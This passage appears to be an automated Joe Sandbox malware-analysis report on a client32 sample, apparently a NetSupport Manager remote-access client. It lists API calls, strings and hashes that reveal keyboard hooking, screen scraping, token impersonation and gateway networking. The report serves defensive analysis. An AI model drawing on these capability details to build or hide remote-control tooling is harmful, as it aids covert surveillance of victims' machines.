                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AdjustChangeCloseFindNotificationPrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 1022747518-0
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                              • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                              • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                              • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                              • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                              • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                              • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                              • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                              • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                              • DispatchMessageA.USER32(?), ref: 11030136
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                              • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                              • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                              • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                              • SetWindowPos.USER32(00040414,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                              • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,EE49F673,?,?,00000000), ref: 1112909A
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                              • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$134349$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                              • API String ID: 372548862-3961403152

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memsetwsprintf
                                                                              • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$134349$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 3802068140-874603751

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: *Dept$*Gsk$1.1$134349$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,759223A0), ref: 11144173
                                                                              • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                              • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                              • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                              • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                              • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                              • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                              • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                              • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                              • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                              • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                              • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                              • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                              • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(setupapi.dll,EE49F673,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                              • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                              • _free.LIBCMT ref: 110AA240
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                              • GetLastError.KERNEL32 ref: 110AA27D
                                                                              • _malloc.LIBCMT ref: 110AA293
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                              • GetLastError.KERNEL32 ref: 110AA301
                                                                              • _free.LIBCMT ref: 110AA313
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                              • _free.LIBCMT ref: 110AA344
                                                                              • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                              • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: $134349$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 1029625771-2092513968
                                                                              • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                              • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                              Control-flow Graph (first basic block: 11142010-11142051; graph not reproduced)
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                              • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                              • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                              • _memset.LIBCMT ref: 11142169
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                              • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                              • RegisterClassExA.USER32(?), ref: 111421DA
                                                                              • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                              • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                              • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                              • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                              • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,EE49F673,11030346,00000000), ref: 11017A6E
                                                                                • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                              • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                              • API String ID: 3706574701-3145203681
                                                                              • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                              • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

                                                                              Control-flow Graph (first basic block: 6eef63c0-6eef6402; graph not reproduced)
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF63E8
                                                                              • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6EEF63FA
                                                                              • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6412
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6EEF643B
                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6450
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6EEF646F
                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6484
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6EEF64A3
                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6EEFD77B,00000000), ref: 6EEF64C5
                                                                              • shutdown.WSOCK32(?,00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF64E9
                                                                              • GetLastError.KERNEL32(?,00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF64F2
                                                                              • timeGetTime.WINMM(?,00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6510
                                                                              • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6526
                                                                              • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6533
                                                                              • timeGetTime.WINMM(?,00000000,?,6EEFD77B,00000000), ref: 6EEF6540
                                                                              • Sleep.KERNEL32(00000001,?,00000000,?,6EEFD77B,00000000), ref: 6EEF654B
                                                                              • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6563
                                                                              • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6574
                                                                              • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF657D
                                                                              • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF658E
                                                                              • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF659E
                                                                              • _memset.LIBCMT ref: 6EEF65C8
                                                                              • LeaveCriticalSection.KERNEL32(?,?,6EEFD77B,00000000), ref: 6EEF65D7
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898,?,00000000,?,6EEFD77B,00000000), ref: 6EEF65F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                              • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                              • API String ID: 3764039262-2631155478
                                                                              • Opcode ID: e7cf5c6f81519337c51056a1e4f5718799656627da67c22f28e71c2c22781c7d
                                                                              • Instruction ID: 244669a2023ee2f62774b257a3a8a5b16c21f663809e65d6d7a0990f5901dcd3
                                                                              • Opcode Fuzzy Hash: e7cf5c6f81519337c51056a1e4f5718799656627da67c22f28e71c2c22781c7d
                                                                              • Instruction Fuzzy Hash: 2051E971624B06DFDB20EFE4C884B9573BABF89319F200915E909D7284E7B0E845CBE0

                                                                              Control-flow Graph (first basic block: 6eef98d0-6eef9932; graph not reproduced)
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                              • API String ID: 909875538-2848211065
                                                                              • Opcode ID: 7c50ab3a33b63770fe0815867e2d0cdc93b869b6a3863dece58b6977c5f92084
                                                                              • Instruction ID: 03fca40053fc26cc4994e4bb331fbc1ddc2685e7e2b86e294ec354d328fb764b
                                                                              • Opcode Fuzzy Hash: 7c50ab3a33b63770fe0815867e2d0cdc93b869b6a3863dece58b6977c5f92084
                                                                              • Instruction Fuzzy Hash: A1D1E571A14219DFDB20CFE4C890BD9B775AF4A308F2441DAD84D9B345E732998ACF91

                                                                              Control-flow Graph (first basic block: 11028c10-11028c2d; graph not reproduced)
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74D41370,?,0000001A), ref: 11028CFD
                                                                              • _strrchr.LIBCMT ref: 11028D0C
                                                                                • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileModuleName__stricmp_l_strrchr
                                                                              • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                              • API String ID: 1609618855-357498123
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 6EF06BD5
                                                                              • GetTickCount.KERNEL32 ref: 6EF06C26
                                                                              • Sleep.KERNEL32(00000064), ref: 6EF06C5B
                                                                                • Part of subcall function 6EF06940: GetTickCount.KERNEL32 ref: 6EF06950
                                                                              • WaitForSingleObject.KERNEL32(0000031C,?), ref: 6EF06C7C
                                                                              • _memmove.LIBCMT ref: 6EF06C93
                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6EF06CB4
                                                                              • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6EF06CD9
                                                                              • GetTickCount.KERNEL32 ref: 6EF06CEC
                                                                              • _calloc.LIBCMT ref: 6EF06D76
                                                                              • GetTickCount.KERNEL32 ref: 6EF06DF3
                                                                              • InterlockedExchange.KERNEL32(037F2D5A,00000000), ref: 6EF06E01
                                                                              • _calloc.LIBCMT ref: 6EF06E33
                                                                              • _memmove.LIBCMT ref: 6EF06E47
                                                                              • InterlockedDecrement.KERNEL32(037F2D02), ref: 6EF06EC3
                                                                              • SetEvent.KERNEL32(00000324), ref: 6EF06ECF
                                                                              • _memmove.LIBCMT ref: 6EF06EF4
                                                                              • GetTickCount.KERNEL32 ref: 6EF06F4F
                                                                              • InterlockedExchange.KERNEL32(037F2CA2,-6EF3A188), ref: 6EF06F60
                                                                              Strings
                                                                              • ResumeTimeout, xrefs: 6EF06BBA
                                                                              • FALSE, xrefs: 6EF06E67
                                                                              • ProcessMessage returned FALSE. Terminating connection, xrefs: 6EF06F25
                                                                              • httprecv, xrefs: 6EF06BDD
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6EF06E62
                                                                              • ReadMessage returned FALSE. Terminating connection, xrefs: 6EF06F3A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                              • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                              • API String ID: 1449423504-919941520
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                              • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(02CD8D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
